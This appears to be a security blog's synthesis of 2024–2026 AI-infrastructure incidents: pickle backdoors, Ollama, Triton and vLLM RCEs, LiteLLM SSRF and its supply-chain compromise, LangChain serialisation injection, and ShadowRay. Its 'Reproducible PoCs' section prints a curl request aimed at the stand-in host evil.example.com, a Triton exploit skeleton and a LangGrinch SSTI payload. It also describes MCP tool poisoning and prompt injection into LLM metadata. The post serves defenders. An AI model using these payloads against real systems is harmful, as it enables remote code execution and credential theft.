AI infrastructure: two years of incidents that confirm the category

Two years ago, “AI security” meant prompt injection, jailbreaks and model evaluations. The surface was the model: what it says and how to make it say something else. By May 2026, the operational conversation has shifted. The dominant problem is no longer in the model; it sits in everything built around the model to serve it. Inference servers with curl evil.com | parse in the endpoint. AI gateways with the OpenAI API key in the proxy and SSRF in the api_base parameter. ML frameworks that load pickle by default and treat weights_only=True as mitigation. As-a-service platforms with cross-tenant pickle. Orchestration libraries with serialization injection. And the closing of the arc: compromising security products (Trivy, Checkmarx) to infiltrate the AI gateways that depend on them.

This post is the synthesis piece. It collects the 12+ public milestones from 2024–2026 that we’ll be referencing for the rest of the year when someone asks “why is AI infrastructure a category of its own?”

Lab notes: the Probllama, NVIDIA Triton chain and LangGrinch PoCs are reproducible in a Linux VM. So is a malicious pickle against torch.load(weights_only=True): the patch arrived in PyTorch 2.6.0, and 2.5.1 and earlier remain exploitable.

The backbone: pickle as a broken legacy format

PyTorch picked pickle as its default serialisation format a decade ago. The decision was deliberate: pickle is Python-native, supports any object, and removes the need for a custom parser. The operational consequence is that any .pt or .bin file is effectively an executable dressed up as a data file. Unpickling can invoke arbitrary Python callables (via __reduce__) at the moment of load, before any human validation.

The milestones that made this consequence public:

February 2024 — JFrog finds ~100 silently backdoored models on Hugging Face Hub. Clones of legitimate models (bert-base-uncased, gpt2 variants) with an attached pickle payload that opens reverse shells or calls out to attacker C2. Hugging Face’s scanning at the time flagged pickle files as unsafe but did not block their download.
April 2024 — Wiz Research publishes the first public cross-tenant case in AI-as-a-Service. They upload a PyTorch model with a malicious __reduce__ to HF’s shared inference and execute code inside the container serving other customers. They read cross-tenant models and tokens. The same platform suffers a CI/CD takeover via Spaces.
December 2024 — JFrog publishes 22 vulnerabilities in MLflow, H2O, PyTorch and MLeap. Half are variations of the same pattern: the framework’s model format runs native code when loaded.
April 2025 — CVE-2025-32434 (CVSS 9.3) breaks the canonical mitigation. torch.load(weights_only=True) — the flag the documentation recommended as “safe loading” — is bypassable with a crafted file. PyTorch 2.5.1 and earlier are vulnerable. The ecosystem’s defensive posture is invalidated by a single CVE.

The defensive move of the year: safetensors. Hugging Face pushes the format (metadata + tensors only, no executable code), picklescan integrates automatically on upload, and most enterprise model registries reject pickle by default from Q3 2025. The problem still drags on:

# This is still the default loading pattern in thousands of pipelines:
import torch
model = torch.load("./model.pt")  # executes any attached pickle

The PyTorch 2.6.0 patch makes weights_only=True actually safe against the known bypass. The structural problem remains the ecosystem contract: a model format that runs code at load(). Any tool that loads models from uncontrolled sources has to go through picklescan or force safetensors. It’s still opt-in.
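To make the load-time execution concrete, here is a minimal standard-library sketch. It pickles an object whose __reduce__ returns a harmless callable (len), shows that pickle.loads calls it, and lists the opcodes that let a pickle import and call objects. The names Payload, SUSPICIOUS_OPCODES and scan_pickle are illustrative assumptions; this only approximates the idea behind scanners such as picklescan and is not their implementation.

```python
import pickle
import pickletools

# Opcodes that import names or call objects during unpickling.
SUSPICIOUS_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "REDUCE",
}


class Payload:
    """Stand-in for a malicious object; the callable used here is harmless."""

    def __reduce__(self):
        # A real attack would return something like (os.system, ("...",)).
        return (len, ("pwned",))


def scan_pickle(data: bytes) -> list[str]:
    """Return suspicious opcode names found in a pickle stream, without loading it."""
    return [
        op.name
        for op, _arg, _pos in pickletools.genops(data)
        if op.name in SUSPICIOUS_OPCODES
    ]


plain = pickle.dumps({"weights": [0.1, 0.2, 0.3]})
evil = pickle.dumps(Payload())

print(scan_pickle(plain))  # containers and floats need no imports or calls
print(scan_pickle(evil))   # an import opcode plus REDUCE
print(pickle.loads(evil))  # the callable ran at load time; this is its return value
```

An opcode scan like this is a coarse filter: legitimate checkpoints also use these opcodes to rebuild tensors, so a practical scanner has to decide which imported names are acceptable. That is the argument for a format that cannot express calls at all.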

Inference servers — HTTP attack surface with a complex multimodal footprint

Two years ago, “inference server” meant an endpoint that took text and returned text. In May 2026, it means an HTTP binary parsing video, image, audio, embeddings, model files, tool descriptions, and multimedia artifacts — each with its own chain of native codecs (FFmpeg, OpenCV, Pillow, libwebp, libpng). The surface is that of an enterprise media server with the maturity of a research project.

The three milestones that define the category:

May 2024 — Ollama Probllama (CVE-2024-37032). Wiz Research publishes a path traversal in the /api/pull endpoint that downloads models from a registry. The digest field in the manifest returned by the registry controls the path where Ollama writes the downloaded file, with no validation. An attacker with API access points Ollama at a registry they control and makes it overwrite system binaries or configs the service reads at boot. Persistent RCE on the next restart. Wiz counts more than 1,000 Ollama instances exposed to the internet at the time of disclosure. Coverage in the May 2024 bulletin.
August 2025 — NVIDIA Triton chain (CVE-2025-23319 + CVE-2025-23320 + CVE-2025-23334). Wiz publishes a chain of three CVEs against the Python backend of Triton Inference Server. Step 1: information leak — the attacker gets the unique name of an internal shared memory region by sending a crafted request. Step 2: with that name, read/write to the region. Step 3: with read/write, corrupt internal structures and trigger code execution. Patch in Triton 25.07. Tens of thousands of exposed instances according to Shodan. Coverage in the August 2025 bulletin.
February 2026 — vLLM CVE-2026-22778 (CVSS 9.8). Orca Security publishes a pre-auth RCE in vLLM via a crafted video URL sent to the multimodal endpoint. The chain lives inside OpenCV’s JPEG2000 decoder (which vLLM uses through its FFmpeg dependency): first a PIL-exception info leak reveals a heap address of the BytesIO (reducing ASLR from 4·10⁹ to ~8 attempts), then a chained heap overflow gives flow control. Patch in vLLM 0.14.1. Coverage in the February 2026 bulletin.

On top of those three, add CVE-2025-62164 (vLLM, deserialisation in the Completions API), CVE-2026-22807 (vLLM, code injection at model load via auto_map with no gating on trust_remote_code), and CVE-2024-50050 (Meta llama-stack, pickle deserialisation whose copy-pasted code reappears in NVIDIA TensorRT-LLM as CVE-2025-23254).

The structural pattern is clear:

inference server = HTTP server with:
 - complex state (multi-model, multi-tenant)
 - inherited native parsers (FFmpeg, OpenCV, Pillow)
 - no auth by default
 - deployed as "trusted internal network" that ends up on the internet

What used to be “serve a model” is today serving a binary that pulls in a stack of native codecs. The threat model inherited from the vllm[image,video] or ollama[full] chain isn’t reflected in the operator’s security posture. A reverse proxy with auth, network segmentation and GPU load monitoring are the three compensating controls in production: the first two keep unauthenticated callers away from these three CVEs, and the third surfaces abuse that gets through.
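As a rough illustration of the first control, the sketch below puts a bearer-token check in front of a placeholder backend using only the standard library. Everything named here (require_bearer_token, inference_backend, call, the lab-secret token) is hypothetical; a production setup would normally do this in the reverse proxy itself rather than in Python.

```python
import hmac
from wsgiref.util import setup_testing_defaults


def require_bearer_token(app, expected_token: str):
    """Wrap a WSGI app so requests without the expected bearer token get a 401."""

    def gated(environ, start_response):
        header = environ.get("HTTP_AUTHORIZATION", "")
        scheme, _, token = header.partition(" ")
        # compare_digest avoids leaking the token through timing differences.
        ok = scheme.lower() == "bearer" and hmac.compare_digest(
            token.encode(), expected_token.encode()
        )
        if not ok:
            start_response("401 Unauthorized", [("Content-Type", "text/plain")])
            return [b"unauthorized\n"]
        return app(environ, start_response)

    return gated


def inference_backend(environ, start_response):
    """Placeholder for the proxied inference server."""
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"model output\n"]


def call(app, token=None):
    """Drive the WSGI app in-process and return the status line it produced."""
    environ = {}
    setup_testing_defaults(environ)
    if token is not None:
        environ["HTTP_AUTHORIZATION"] = f"Bearer {token}"
    seen = {}
    body = app(environ, lambda status, headers: seen.update(status=status))
    list(body)  # consume the response body
    return seen["status"]


gateway = require_bearer_token(inference_backend, expected_token="lab-secret")
print(call(gateway))                # no Authorization header
print(call(gateway, "wrong"))       # wrong token
print(call(gateway, "lab-secret"))  # correct token
```

The point of the design is that the unauthenticated request never reaches the codec stack behind the endpoint, which is where the pre-auth bugs in this section live.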

AI gateways — the credentialed proxy as the new crown jewel

LiteLLM is the case study. An AI gateway fans out LLM calls to multiple providers (OpenAI, Anthropic, Azure, AWS Bedrock, local Ollama), consolidates billing, applies rate limiting, and centralises credentials. The company runs the proxy, puts the provider API keys there, and devs call the proxy with lighter internal credentials. The provider key lives in the proxy, not on the developer’s machine: that’s the product’s value proposition.

In 2024, LiteLLM piles up six public CVEs, all tied to the credentialed-proxy pattern:

CVE-2024-2952 — Jinja SSTI in /completions via an unsanitised chat_template.
CVE-2024-5225 — SQL injection in /global/spend/logs via direct concatenation of api_key.
CVE-2024-5710 — improper access control in team management.
CVE-2024-5751 — RCE in /config/update via add_deployment decoding base64 into os.environ.
CVE-2024-6587 — SSRF in api_base: the attacker sets the parameter to their server, receives the forwarded request with the proxy’s API key in the Authorization header, and walks off with the OpenAI / Anthropic / Azure key. Coverage in the July 2024 bulletin.
CVE-2024-9606 — API key masking that only masks the first 5 characters in logs.
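The last item in the list is easy to picture with a toy example. The sketch below contrasts a prefix-only mask, modelled on the description above, with a mask that keeps only a short suffix. Both functions and the sample key are made up for illustration and are not LiteLLM code.

```python
def mask_prefix_only(value: str, hidden: int = 5) -> str:
    """Flawed approach: hide the first few characters and log the rest."""
    return "*" * min(hidden, len(value)) + value[hidden:]


def mask_secret(value: str, visible: int = 4) -> str:
    """Safer approach: hide everything except the last `visible` characters."""
    if len(value) <= visible:
        return "*" * len(value)
    return "*" * (len(value) - visible) + value[-visible:]


fake_key = "sk-test-0123456789abcdef"  # made-up value, not a real credential

print(mask_prefix_only(fake_key))  # most of the key is still readable
print(mask_secret(fake_key))       # only a short suffix survives
```

Keeping a short suffix is usually enough for an operator to tell keys apart in logs without making the log a credential store.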

Each CVE is a classic API gateway pattern (SSRF, SQLi, SSTI) in an AI product that inherits the full surface of a traditional proxy. The reason is that it is one: AI gateway = API gateway + prompt bus. The difference is the software maturity.

The LiteLLM arc closes in March 2026 with the TeamPCP supply-chain compromise. The group first compromises the Trivy security scanner (19 March), rewriting Git tags in aquasecurity/trivy-action with a credential-harvester payload. Five days later they use the PyPI credentials of the LiteLLM maintainer, captured via the prior Trivy compromise, to publish litellm==1.82.7 and litellm==1.82.8 with a three-stage payload. The tools a dev installs to defend themselves become the vector. The AI gateway stops being just a credentialed proxy: it’s a pivot point into the infra hosting it. Coverage in the March 2026 bulletin.

Minimum defensive action for AI gateways in production:

Provider credential audit trail (which dev / which tenant requested which key, when).
Rate limiting per destination (not just by provider, by host).
api_base allowlist to block SSRF.
Version pinning + package hash verification.
Network isolation of the proxy: if the AI gateway runs in a namespace with cloud privileges (bucket access, KMS, secrets manager), a proxy compromise becomes a cloud account compromise.
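The api_base allowlist from the list above could look roughly like this. It is a minimal sketch using only the standard library: ALLOWED_API_HOSTS and is_allowed_api_base are hypothetical names, the host list is an example, and nothing here is LiteLLM’s own configuration surface.

```python
import ipaddress
from urllib.parse import urlsplit

# Hypothetical allowlist: the only upstream hosts the proxy may forward keys to.
ALLOWED_API_HOSTS = {"api.openai.com", "api.anthropic.com"}


def is_allowed_api_base(url: str) -> bool:
    """Accept only HTTPS URLs whose host is explicitly allowlisted."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    host = (parts.hostname or "").lower()
    try:
        ipaddress.ip_address(host)
        return False  # literal IPs (metadata services, internal hosts) are never allowed
    except ValueError:
        pass  # not an IP literal, fall through to the hostname check
    return host in ALLOWED_API_HOSTS


for candidate in (
    "https://api.openai.com/v1",
    "https://attacker.example/v1",
    "http://api.openai.com/v1",
    "https://169.254.169.254/latest/meta-data",
    "https://api.openai.com@attacker.example/v1",
):
    print(candidate, is_allowed_api_base(candidate))
```

Matching on the parsed hostname rather than on a string prefix is what defeats the userinfo trick in the last candidate. The check does not cover DNS-level tricks, so egress filtering at the network layer is still needed.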

ML frameworks with research-project security

MCP tool poisoning (March 2025) opened the editorial category. The malicious MCP server hides instructions in a tool’s description; the client passes them to the model as prompt; the model obeys. What looked like a spec problem in November 2024 (when we analysed MCP at the protocol level) became an operational category with OWASP MCP Top 10 v0.1 a year later.

The same pattern shows up in LangChain in December 2025. LangGrinch — CVE-2025-68664 (CVSS 9.3). The dumps() and dumpd() functions don’t escape dictionaries with the 'lc' key when serialising free-form metadata. The 'lc' key is LangChain’s internal marker for its serialised objects; when an attacker manages to place a structure with 'lc' inside user-controlled data (additional_kwargs, response_metadata of an LLM response), re-serialising the conversation makes the round-trip load arbitrary objects from the pre-approved namespaces langchain_core / langchain / langchain_community. With secrets_from_env=True (default), it exfiltrates environment variables. With Jinja2 enabled, RCE.

LangChain.js suffers the equivalent bug as CVE-2025-68665 (CVSS 8.6). Coverage in the December 2025 bulletin.

# Vulnerable pattern: conversation round-trip with LLM-controlled fields
from langchain_core.load import dumps, loads
from langchain_core.messages import AIMessage

# Attacker injects via prompt injection a message whose response_metadata has:
malicious = {
    "lc": 1, "type": "constructor",
    "id": ["langchain", "schema", "..."],
    "kwargs": {"secrets_from_env": True},  # further kwargs elided
}
message = AIMessage(content="ok", response_metadata=malicious)

serialized = dumps(message)   # vulnerable versions don't escape 'lc' in metadata
restored = loads(serialized)  # revives the payload as a trusted LangChain object

The root bug: the system assumes the contents of additional_kwargs and response_metadata are flat. In reality, in a system with LLMs and prompt injection, any field controllable by the model’s output is attacker-controlled. The attack surface includes the whole conversation, not just the last prompt.
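One way to act on that observation is to treat nested 'lc' markers in model-controlled fields as hostile before anything is serialised. The helper below is a hedged sketch in plain Python: contains_lc_marker is a hypothetical name, it does not call LangChain, and it is not the upstream fix.

```python
from typing import Any


def contains_lc_marker(value: Any) -> bool:
    """Return True if any nested dict carries the 'lc' key used as a serialisation marker."""
    if isinstance(value, dict):
        if "lc" in value:
            return True
        return any(contains_lc_marker(v) for v in value.values())
    if isinstance(value, (list, tuple)):
        return any(contains_lc_marker(v) for v in value)
    return False


benign_metadata = {"model": "example-model", "usage": {"tokens": 42}}
hostile_metadata = {
    "usage": {"tokens": 42},
    "extra": [{"lc": 1, "type": "constructor", "id": ["..."], "kwargs": {}}],
}

print(contains_lc_marker(benign_metadata))
print(contains_lc_marker(hostile_metadata))
```

A guard like this would sit in front of whatever persists the conversation (cache, database, queue) and reject or strip the message; it complements upgrading the library, it does not replace it.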

The SDK’s save / load / dumps / loads functions are attack surface when the content comes from a model. The pattern repeats:

| Framework | Function | CVE | Year |
| --- | --- | --- | --- |
| PyTorch | `torch.load()` | CVE-2025-32434 | 2025 |
| PyTorch Lightning | `torch.load()` without `weights_only` | CVE-2024-5452 | 2024 |
| LangChain | `dumps()` / `loads()` | CVE-2025-68664 | 2025 |
| LangChain.js | same | CVE-2025-68665 | 2025 |
| vLLM | `torch.load()` in Completions | CVE-2025-62164 | 2025 |
| MLflow | recipe loader | (several JFrog 2024) | 2024 |

The SDK’s safety classifier is an afterthought. The operational question: which step of your pipeline calls save/load with content whose origin includes an LLM?

Deliberate design without defences — the Ray case

Anyscale Ray is the extreme example. CVE-2023-48022 (CVSS 9.8), missing authentication in the Ray Job Submission API (/api/jobs/), isn’t a bug in the vendor’s view. It’s deliberate design: Ray runs on a trusted network, says Anyscale, so the admin API doesn’t need auth. The argument is technically valid. The problem is operational: default user deployments don’t provide that segmentation.

March 2024 — ShadowRay 1.0 (Oligo Security). Active campaign since September 2023. Thousands of Ray clusters exposed to the internet with public dashboards. Attackers submit malicious jobs via API, run arbitrary code with the process’s privileges, install XMRig to mine Monero on corporate GPUs, and exfiltrate cloud credentials. ByteDance, Amazon, governments among the confirmed victims. Coverage in the March 2024 bulletin.
November 2025 — ShadowRay 2.0 (same bug, different scale). 230,000 Ray servers exposed to the internet (vs a few thousand in 2024). The botnet is now self-spreading: each compromised cluster scans the public Ray dashboard space and replicates the payload. The payload includes XMRig + sockstress (DDoS via TCP state exhaustion), probably aimed at rival pools. The code carries signs of AI generation (unnecessarily verbose docstrings, unused echo lines, repetitive comments, boilerplate error handling), which points to operators with little coding background scaling up with a model. Coverage in the November 2025 bulletin.

Anyscale holds the position in May 2026: “Ray must run on an isolated network”. Technically correct. Operationally irrelevant. The “by design” argument fails when market behaviour differs from what the vendor assumes.

The same pattern applies to:

Ollama — localhost only by default, except the real behaviour includes ollama serve on a VPS with port forwarding.
MLflow tracking servers — internal network, but they expose LFI, XSS and artifact serving on any corporate network with distributed development.
Hugging Face Spaces — sandboxed builders, until a pickle payload runs on the shared host.
MCP servers — user-installed only, until the public catalog fills with third-party servers carrying tool poisoning.

The editorial read is the same for all five: the threat model declared by the framework vendor is a technical decision the operator silently inherits. If the decision assumes network isolation and the operator doesn’t provide it, operational responsibility is ambiguous and the CVEs don’t get assigned to the framework — they end up in the “abused, not exploited” limbo.
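An operator can at least make the inherited assumption visible. The sketch below classifies the address a service is configured to listen on, so a deployment check can flag “isolated by design” software bound to something other than loopback. bind_exposure and its labels are hypothetical; the function inspects a configuration value only and cannot see firewalls, port forwards or load balancers.

```python
import ipaddress


def bind_exposure(host: str) -> str:
    """Classify a listen address as loopback, private, public, all-interfaces or unknown."""
    if host in ("", "0.0.0.0", "::"):
        return "all-interfaces"
    if host == "localhost":
        return "loopback"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "unknown"  # a hostname we cannot classify without resolving it
    if addr.is_loopback:
        return "loopback"
    if addr.is_private:
        return "private"
    return "public"


for configured in ("127.0.0.1", "::1", "0.0.0.0", "10.0.0.5", "8.8.8.8", "ray-head"):
    print(configured, bind_exposure(configured))
```

Anything other than loopback for a service that ships without authentication is a finding worth a ticket, even if the network is believed to be segmented.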

Reproducible PoCs

Three sandbox PoCs that show the categories without touching anything in production.

Probllama (CVE-2024-37032) in Docker

Docker image with Ollama 0.1.33 (pre-patch):

docker run -d -p 11434:11434 --name ollama-vuln ollama/ollama:0.1.33

# The attacker points Ollama at a registry they control:
curl -X POST http://localhost:11434/api/pull \
  -H "Content-Type: application/json" \
  -d '{
    "name": "evil.example.com/library/model",
    "insecure": true
  }'

# The rogue registry answers with a manifest whose layer digest is a
# traversal string (e.g. ../../../../etc/cron.d/backdoor) instead of a sha256.
# Ollama 0.1.33 uses that digest as a file path and writes the blob there;
# whatever reads that file later (cron, a loader, the service at boot) runs it.

Ollama 0.1.34+ validates the digest format and rejects path traversal. Capturing the vulnerable behaviour confirms the category: an endpoint built to download models ends up as a write-anywhere primitive.
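The class of fix described above can be sketched in a few lines: accept only well-formed identifiers, then confirm the resolved path still sits inside the storage directory. This is an illustration under assumptions, not Ollama’s code (Ollama is written in Go); DIGEST_RE, BLOBS_DIR and blob_path are hypothetical names.

```python
import re
from pathlib import Path

# Accept only a sha256 digest in canonical hex form.
DIGEST_RE = re.compile(r"sha256:[0-9a-f]{64}")

BLOBS_DIR = Path("/tmp/ollama-lab/blobs")  # hypothetical storage directory


def blob_path(blobs_dir: Path, digest: str) -> Path:
    """Map a digest to a file path, refusing anything that is not a plain sha256 digest."""
    if not DIGEST_RE.fullmatch(digest):
        raise ValueError(f"invalid digest: {digest!r}")
    candidate = (blobs_dir / digest.replace(":", "-")).resolve()
    # Defence in depth: the resolved path must still be inside the blob directory.
    if blobs_dir.resolve() not in candidate.parents:
        raise ValueError("path escapes the blob directory")
    return candidate


print(blob_path(BLOBS_DIR, "sha256:" + "a" * 64).name)

try:
    blob_path(BLOBS_DIR, "../../../../etc/cron.d/backdoor")
except ValueError as exc:
    print("rejected:", exc)
```

Either check alone would stop the traversal string; doing both means a future change to the digest format cannot silently reopen the write-anywhere primitive.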

NVIDIA Triton chain (CVE-2025-23319/20/34) — exploit skeleton

Wiz doesn’t publish a full exploit, but the chain is documented. Lab setup: Triton 24.06 without the patch + Python backend enabled. Step 1 is sending a request to the inference endpoint that triggers an error parsing the Python model — the error message includes the unique name of the shared memory region Triton created for that request. Capturing that name gives access to the region (step 2), where the attacker writes control structures that steer the flow of step 3 into an attacker-controlled callback. The result is RCE in the Triton process.

The skeleton that reproduces the pattern without putting the full RCE together:

import re
import requests

TARGET = "http://target:8000"  # lab instance only

def extract_shm_name(text):
    # Pull the leaked region name out of the error body (pattern is illustrative)
    match = re.search(r"'(triton_[\w-]+)'", text)
    return match.group(1) if match else None

# Step 1: info leak via the inference endpoint
r = requests.post(
    f"{TARGET}/v2/models/vuln-model/infer",
    data="...",  # body crafted to force an error (elided)
)
# The error message contains something like:
# "Cannot find shared memory region 'triton_shm_abc123_xyz789'"

shm_name = extract_shm_name(r.text)  # "triton_shm_abc123_xyz789"

# Step 2: register the leaked internal region through the shared-memory API
# The vulnerable versions accept the internal name without auth or validation
reg = requests.post(
    f"{TARGET}/v2/systemsharedmemory/region/leaked/register",
    json={"key": shm_name, "offset": 0, "byte_size": 4096},  # size is a placeholder
)
# From here, controlled reads and writes to the region trigger
# corruption of internal structures → control flow

Patch in Triton 25.07. The chain needs no sophisticated exploit primitive — it needs the combination of three logic bugs in different endpoints that assume trust in the caller.

LangGrinch (CVE-2025-68664) in a LangChain harness

Reproducible locally with langchain-core < 0.3.81 (or 1.x < 1.2.5):

from langchain_core.load import dumps, loads
from langchain_core.messages import AIMessage

# Attacker injects via prompt injection an AIMessage whose response_metadata
# contains a structure LangChain interprets as a serialised object:
malicious_message = AIMessage(
    content="ok",
    response_metadata={
        "lc": 1,
        "type": "constructor",
        "id": ["langchain_core", "prompts", "prompt", "PromptTemplate"],
        "kwargs": {
            "template": "{{ ''.__class__.__mro__[1].__subclasses__()[...]() }}",
            "template_format": "jinja2"
        }
    }
)

# The operator serialises the conversation to persist it:
serialized = dumps(malicious_message)

# On loading back, vulnerable versions instantiate the PromptTemplate with Jinja2:
restored = loads(serialized)
# Once the revived template is rendered, Jinja2 with access to the
# __subclasses__ chain runs arbitrary code

Fix in langchain-core 0.3.81 and 1.2.5: allowed_objects allowlist, Jinja2 disabled by default, secrets_from_env=False. Real defence also means reviewing which pipelines round-trip LLM messages (cache, streaming, persist-to-DB): any dumps/loads over an LLM message is a point to audit.

Operational read for CISOs

What’s worth taking into the corporate threat model as of May 2026:

Inventory AI infrastructure as a separate category. It isn’t “more Python software”. It’s HTTP servers with multimodal surface, proxies holding third-party credentials, as-a-service platforms with cross-tenant execution, and model registries with executable code in load(). If your CMDB doesn’t distinguish “inference server” from “API gateway”, the blast radius is underestimated.
Pickle as a present threat, not a historical one. Any torch.load, pickle.load or equivalent over a file the operator doesn’t control is pending RCE. weights_only=True is no longer universal mitigation after CVE-2025-32434. Safetensors is the structural answer; pinning PyTorch ≥ 2.6.0 is the minimum.
AI gateway = crown jewel. Your LiteLLM / Portkey / Helicone / OpenRouter on-prem holds API keys worth money (OpenAI/Anthropic quotas) and sometimes data (logs of internal prompts). Treat it the way you’d treat a PAM: network isolation, cloud account segregation, installed-package monitoring via hash, version allowlists, alerting on new upstream releases.
Inference servers behind auth. Ollama, vLLM, Triton, TGI, llama.cpp: the popular inference servers either lack native authentication or ship with it disabled by default. Reverse proxy with auth + network segmentation is the minimum. If the service is internet-facing, assume pending compromise.
Python package and model supply chain. The TeamPCP compromise of LiteLLM / Trivy / Checkmarx shows that security products are valid targets. For AI infra specifically, strict pinning + hash verification + monitoring upstream changes are a requirement, not best practice.
“Secure by design if isolated” as an operational flag. Ray, local MCP servers, Ollama on localhost — frameworks that delegate security to network isolation are entirely the operator’s responsibility. The vendor isn’t going to patch what they consider expected behaviour.
save/load pipelines as surface. Any process that serialises/deserialises messages that passed through an LLM is now a vector for prompt injection upgraded to RCE. langchain-core, llama-index, haystack and dspy have equivalent functions — audit internal usage.
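For the supply-chain item in the list above, hash verification is the piece that is easiest to automate. On the packaging side, pip’s --require-hashes mode enforces it for wheels; the sketch below shows the same idea for an arbitrary downloaded artifact such as a model file. sha256_of and verify_artifact are hypothetical helper names, and the pinned digest is assumed to come from a trusted, separately stored lockfile.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path


def sha256_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream a file through SHA-256 so large model files need not fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_artifact(path: Path, expected_hex: str) -> bool:
    """Compare the file's digest with the pinned value."""
    return hmac.compare_digest(sha256_of(path), expected_hex.lower())


# Demo with a throwaway file standing in for a downloaded wheel or model.
with tempfile.TemporaryDirectory() as tmp:
    artifact = Path(tmp) / "artifact.bin"
    artifact.write_bytes(b"pinned release contents")
    pinned = hashlib.sha256(b"pinned release contents").hexdigest()

    matches_pinned = verify_artifact(artifact, pinned)
    artifact.write_bytes(b"tampered release contents")
    matches_after_tamper = verify_artifact(artifact, pinned)

print(matches_pinned, matches_after_tamper)
```

A hash pin only helps if the pinned value was recorded before the compromise, which is why the list pairs it with monitoring of upstream releases.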

The frontier labs respond in April 2026

On 7 April 2026, Anthropic publishes Project Glasswing and the Mythos model, the first commercial gated frontier model with a mandatory harness. Glasswing is a direct answer to the pattern this post just catalogued: if the risk of a model in production isn’t in what it says but in what it executes when it has tool access, the defensive answer has to live in the harness, not in the model. The Glasswing architecture applies safety classifiers on every tool call, a third-party-verifiable cryptographic audit trail, rate limits differentiated by category of action (query vs write vs execute), and a remote kill-switch via signed messages.

Two weeks later, OpenAI publishes GPT-5.5-Cyber (23 April 2026) — a GPT-5.5 variant trained specifically for blue team tasks (SIEM triage, KQL queries, SIGMA generation), embedded in Microsoft Security Copilot Agents. And Anthropic ships Claude Opus 4.7 (16 April 2026) as a frontier model with extended thinking and native Glasswing support.

What these three moves close for this post: the defensive side of the AI infrastructure quadrant stops being just patch + safetensors + version pinning and starts to include dedicated commercial products. The timeline matches the one the offensive side closed a year earlier with XBOW reaching #1 on HackerOne. The full quadrant is covered in the agentic red team piece.

The gap between disciplines: the AI team spent 24 months iterating on prompts, evals, agent harnesses and RAG. The security team had spent decades iterating on HTTP servers, deserialisation, supply chain and identity. The two teams didn’t sit down together in earnest until 2024–2025. The chain of incidents we just walked through is the documentation of that blind spot — and Glasswing is the first coordinated industrial response.

References

Pickle / model format

JFrog, Data Scientists Targeted by Malicious Hugging Face ML Models with Silent Backdoor (Feb 2024): https://jfrog.com/blog/data-scientists-targeted-by-malicious-hugging-face-ml-models-with-silent-backdoor/
Wiz Research, Hugging Face works with Wiz to strengthen AI cloud security (Apr 2024): https://www.wiz.io/blog/wiz-and-hugging-face-address-risks-to-ai-infrastructure
The Hacker News (on JFrog research), Researchers Uncover Flaws in Popular Open-Source Machine Learning Frameworks (Dec 2024): https://thehackernews.com/2024/12/researchers-uncover-flaws-in-popular.html
PyTorch advisory CVE-2025-32434: https://github.com/advisories/GHSA-53q9-r3pm-6pq6

Inference servers

Wiz Research, Probllama: Ollama RCE Vulnerability (CVE-2024-37032): https://www.wiz.io/blog/probllama-ollama-vulnerability-cve-2024-37032
Wiz Research, Breaking NVIDIA Triton: CVE-2025-23319 chain: https://www.wiz.io/blog/nvidia-triton-cve-2025-23319-vuln-chain-to-ai-server
Orca Security, Critical RCE in vLLM (CVE-2026-22778): https://orca.security/resources/blog/cve-2026-22778-vllm-rce-vulnerability/

AI gateways

GitHub Advisory CVE-2024-6587 (LiteLLM SSRF): https://github.com/advisories/GHSA-g26j-5385-hhw3
Trend Micro, Your AI Gateway Was a Backdoor: Inside the LiteLLM Supply Chain Compromise (Mar 2026): https://www.trendmicro.com/en_us/research/26/c/inside-litellm-supply-chain-compromise.html
Datadog Security Labs, LiteLLM and Telnyx compromised on PyPI: Tracing the TeamPCP supply chain campaign: https://securitylabs.datadoghq.com/articles/litellm-compromised-pypi-teampcp-supply-chain-campaign/
Unit 42, Weaponizing the Protectors: TeamPCP’s Multi-Stage Supply Chain Attack: https://unit42.paloaltonetworks.com/teampcp-supply-chain-attacks/
Snyk, How a Poisoned Security Scanner Became the Key to Backdooring LiteLLM: https://snyk.io/blog/poisoned-security-scanner-backdooring-litellm/

ML frameworks / SDK

GitHub Advisory CVE-2025-68664 (LangGrinch): https://github.com/advisories/GHSA-c67j-w6g6-q2cm
Cyata, All I Want for Christmas is Your Secrets: LangGrinch hits LangChain Core: https://cyata.ai/blog/langgrinch-langchain-core-cve-2025-68664/
Invariant Labs, MCP Tool Poisoning Attacks (Mar 2025): https://invariantlabs.ai/blog/mcp-security-notification-tool-poisoning-attacks

“By design”

Oligo Security, ShadowRay (Mar 2024): https://www.oligo.security/blog/shadowray-attack-ai-workloads-actively-exploited-in-the-wild
The Hacker News, ShadowRay 2.0 (Nov 2025): https://thehackernews.com/2025/11/shadowray-20-exploits-unpatched-ray.html

Related posts in the arc

February 2024 bulletin — JFrog HF malicious models
March 2024 bulletin — ShadowRay 1.0
April 2024 bulletin — Wiz × HF cross-tenant
May 2024 bulletin — Ollama Probllama
July 2024 bulletin — LiteLLM CVE-2024-6587
December 2024 bulletin — JFrog 22 ML framework issues
MCP tool poisoning (Mar 2025)
April 2025 bulletin — PyTorch CVE-2025-32434
August 2025 bulletin — NVIDIA Triton chain
November 2025 bulletin — ShadowRay 2.0
December 2025 bulletin — LangGrinch
State of MCP at 16 months (Mar 2026)
February 2026 bulletin — vLLM CVE-2026-22778
March 2026 bulletin — LiteLLM supply chain TeamPCP
